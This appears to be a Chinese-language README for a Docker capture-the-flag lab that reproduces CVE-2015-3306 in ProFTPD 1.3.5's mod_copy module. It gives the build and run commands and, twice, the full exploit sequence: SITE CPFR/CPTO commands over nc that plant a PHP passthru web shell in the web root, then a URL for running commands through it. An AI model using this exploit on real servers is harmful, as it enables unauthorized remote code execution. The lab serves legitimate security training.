此实验室旨在模拟漏洞 CVE-2015-3306 —— ProFTPD mod_copy 远程文件复制到 RCE
用于学习通过 ProFTPD 的 mod_copy 模块实现 Web Shell 注入 RCE。
mod_copy(SITE CPFR / SITE CPTO)/var/www/htmlflag_RANDOM.txt/etc/proftpd/proftpd.conf
/usr/local/proftpd/
/var/www/html/
/tmp/flag_xxx.txt
/entrypoint.sh
docker build -t sentinel7-proftpd-lab .
docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php
通过浏览器访问:
http://<IP>/webshell.php?cmd=<command>
存储位置:
/tmp/flag_RANDOM.txt
本实验室模拟 CVE-2015-3306,使用带 mod_copy 的 ProFTPD 1.3.5,允许攻击者执行 ProFTPD mod_copy 远程文件复制到 RCE。
mod_copy(SITE CPFR + SITE CPTO)flag_RANDOM.txtnc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php
然后执行:
http://<IP>/webshell.php?cmd=<command>
/tmp/flag_RANDOM.txt
仅供教育和授权的渗透测试使用。